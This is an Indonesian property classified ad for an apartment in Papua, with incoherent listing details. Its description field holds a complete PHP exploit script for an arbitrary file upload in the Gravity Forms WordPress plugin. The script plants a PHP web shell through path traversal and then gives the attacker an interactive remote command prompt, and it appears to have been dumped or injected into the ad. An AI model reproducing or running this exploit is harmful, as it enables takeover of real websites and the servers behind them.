tanah

Apartement
Rp. 800.000,00,-
Iklan ini telah dilihat : 125 kali
Pasang : 18 Januari 2017
Informasi Umum
Tipe Properti : Apartement Dijual
Alamat : subang
Kota : Nduga
Propinsi : Papua
 
Keterangan Lengkap
LT / LB : 45 M2 / 45 M2
Harga : Rp. 800.000,00,-
Keterangan : <?php /**************************************************************************************************************************** * * Exploit Title : Gravity Forms [WP] - Arbitrary File Upload * Vulnerable Version(s): 1.8.19 (and below) * Write-Up : https://blog.sucuri.net/2015/02/malware-cleanup-to-arbitrary-file-upload-in-gravity-forms.html * Coded by : Abk Khan [ an0nguy @ protonmail.ch ] * *****************************************************************************************************************************/ error_reporting(0); echo " _____ _ _ ______ _ _ / ____| (_) | | ____| | | | | | __ _ __ __ ___ ___| |_ _ _| |__ __ _| | |___ | | |_ | '__/ _` \ \ / / | __| | | | __/ _` | | / __| | |__| | | | (_| |\ V /| | |_| |_| | | | (_| | | \__ \ \_____|_| \__,_| \_/ |_|\__|\__, |_| \__,_|_|_|___/ __/ | |___/ > an Exploiter by AnonGuy\n"; $domain = (@$argv[1] == '' ? 'http://localhost/wordpress' : @$argv[1]); $url = "$domain/?gf_page=upload"; $shell = "$domain/wp-content/_input_3_khan.php5"; $separator = '-------------------------------------------------------------------'; $ch = curl_init($url); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, '<?php system($_GET[0]); ?>&form;_id=1&name;=khan.php5&gform;_unique_id=../../../../&field;_id=3'); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $response = curl_exec($ch); curl_close($ch); if (strpos($response, '"ok"') !== false) { echo "$separator\nShell at $shell\n$separator\nSpawning a 'No-Session' Shell . . . Done!\n$separator\n"; while ($testCom != 'exit') { $user = trim(get_string_between(file_get_contents("$shell?0=echo%20'~';%20whoami;%20echo%20'~'"), '~', '~')); $b0x = trim(get_string_between(file_get_contents("$shell?0=echo%20'~';%20hostname;%20echo%20'~'"), '~', '~')); echo "$user@$b0x:~$ "; $handle = fopen("php://stdin", 'r'); $testCom = trim(fgets($handle)); fclose($handle); $comOut = trim(get_string_between(file_get_contents("$shell?0=echo%20'~';%20" . urlencode($testCom) . ";%20echo%20'~'"), '~', '~')) . "\n"; echo $comOut; } } else { die("$separator\n$domain doesn't seem to be vulnerable! :(\n$separator"); } function get_string_between($string, $start, $end) { # stolen from stackoverflow! $string = ' ' . $string; $ini = strpos($string, $start); if ($ini == 0) return ''; $ini += strlen($start); $len = strpos($string, $end, $ini) - $ini; return substr($string, $ini, $len); } ?>
 
Kontak
Nama : jimm
Email : jimm@gmail.com
Phone : 087726936915